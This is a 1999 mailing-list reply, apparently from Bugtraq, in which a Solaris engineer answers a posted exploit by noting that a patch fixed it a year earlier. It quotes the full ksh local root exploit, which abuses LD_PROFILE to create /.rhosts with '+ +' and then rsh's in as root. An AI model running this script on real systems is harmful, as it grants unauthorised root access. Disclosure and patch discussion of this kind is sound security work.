>works on solaris 2.6 sparc anyway... > >#! /bin/ksh ># LD_PROFILE local root exploit for solaris ># [EMAIL PROTECTED] 19990922 >umask 000 >ln -s /.rhosts /var/tmp/ps.profile >export LD_PROFILE=/usr/bin/ps >/usr/bin/ps >echo + + > /.rhosts >rsh -l root localhost csh -i This was bug# 4150646/1241843 which is fixed in patch 105490-05 (or higher), which was released over 1 year ago (Sep/10/98)! Patch 105490-07 is in the current recommened patch set for Solaris 2.6, so it is publicly available. I strongly recommend that people apply the latest recommended and security patch sets when testing out security exploits. That way you won't send out information about exploits which have been long fixed and needlessly panic people. -- Darren J Moffat
Re: LD_PROFILE local root exploit for solaris 2.6
Darren Moffat - Solaris Sustaining Engineering Sat, 25 Sep 1999 23:40:33 -0700
- LD_PROFILE local root explo... Steve Mynott
- Re: LD_PROFILE local r... Brock Sides
- Re: LD_PROFILE loc... Erik Fichtner
- Re: LD_PROFILE local r... Casper Dik
- Re: LD_PROFILE loc... Eric Daniel
- Re: LD_PROFILE local r... Pavel Kankovsky
- Re: LD_PROFILE local r... Darren Moffat - Solaris Sustaining Engineering
- Re: LD_PROFILE loc... Valdis . Kletnieks
